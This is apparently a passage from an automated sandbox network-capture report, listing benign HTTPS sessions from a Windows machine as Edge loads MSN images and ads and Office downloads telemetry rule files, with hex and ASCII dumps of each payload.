2024-11-25 23:25:50 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G Last-Modified: Sat, 23 Nov 2024 18:14:45 GMT X-Source-Length: 5699 X-Datacenter: eastus X-ActivityId: 5c4ddcbc-0d99-4ea0-a3c4-13e18d04c61f Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 5699 Cache-Control: public, max-age=240467 Expires: Thu, 28 Nov 2024 18:13:37 GMT Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close
2024-11-25 23:25:50 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.6	49899	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sun, 17 Nov 2024 01:27:48 GMT X-Datacenter: eastus X-ActivityId: 4e8f5161-6e89-49b3-b675-e3ba25e83bf7 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=50550 Expires: Tue, 26 Nov 2024 13:28:20 GMT Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close
2024-11-25 23:25:50 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.6	49896	104.117.182.56	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	634	OUT	GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:50 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1u24yb Last-Modified: Fri, 15 Nov 2024 21:15:54 GMT X-Source-Length: 3765 X-Datacenter: westus X-ActivityId: f3e4c9dc-fa16-4ee6-89a5-1e9169e1c90d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 3765 Cache-Control: public, max-age=337922 Expires: Fri, 29 Nov 2024 21:17:52 GMT Date: Mon, 25 Nov 2024 23:25:50 GMT Connection: close
2024-11-25 23:25:50 UTC	3765	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 01 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 3e 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22 Data Ascii: PNGIHDR22?gAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	49894	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:50 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:50 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 97970dc3-901e-008f-6c91-3f67a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232550Z-174f7845968cdxdrhC1EWRg0en0000000ue00000000008wg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:50 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	49895	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:50 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:50 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:50 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232550Z-174f7845968kvnqxhC1EWRmf3g0000000dg0000000000209 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:50 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.6	49903	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:51 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:51 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:51 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232551Z-174f78459688l8rvhC1EWRtzr000000007900000000001w9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:51 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.6	49902	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:51 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:51 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:51 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 8b39e191-d01e-0065-5191-3fb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232551Z-174f7845968cpnpfhC1EWR3afc0000000u5g0000000003c6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:51 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.6	49905	18.173.132.23	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:51 UTC	1012	OUT	GET /b2?rn=1732577146766&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0675AFABBF8562701E27BAE9BE8263C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1E763f68b32d41d689280de1732577149; XID=1E763f68b32d41d689280de1732577149
2024-11-25 23:25:52 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Mon, 25 Nov 2024 23:25:51 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 c28d583393bad4965b8efa4ef27ccc9e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P2 X-Amz-Cf-Id: 2wuecRFtugZ_Z48FwLUv2SorB8t4xoEwzpWAjXWOr1rEkG3mzvmj7Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	49904	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:51 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:52 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:52 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232551Z-174f7845968jrjrxhC1EWRmmrs0000000utg0000000003q4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:52 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.6	49906	23.96.180.189	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:52 UTC	999	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0675AFABBF8562701E27BAE9BE8263C5&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=4d6188d991f34dbfd50468dabb62ef6a HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0675AFABBF8562701E27BAE9BE8263C5; _EDGE_S=F=1&SID=289DED71267C6C8C1A3EF83327A06D4B; _EDGE_V=1
2024-11-25 23:25:52 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2711 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132819-T700343875-C128000000002114589+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002114589+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:52 GMT Connection: close
2024-11-25 23:25:52 UTC	2711	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 46 65 64 61 69 61 20 50 61 73 73 2c 20 49 74 61 6c 79 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 46 65 64 61 69 61 2b 50 61 73 73 25 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Fedaia Pass, Italy\",\"cta\":\"https:\/\/www.bing.com\/search?q=Fedaia+Pass%

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	49908	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:52 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:52 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:52 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 3d9c2adf-901e-00ac-7b91-3fb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232552Z-174f7845968kvnqxhC1EWRmf3g0000000df000000000038d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:52 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" 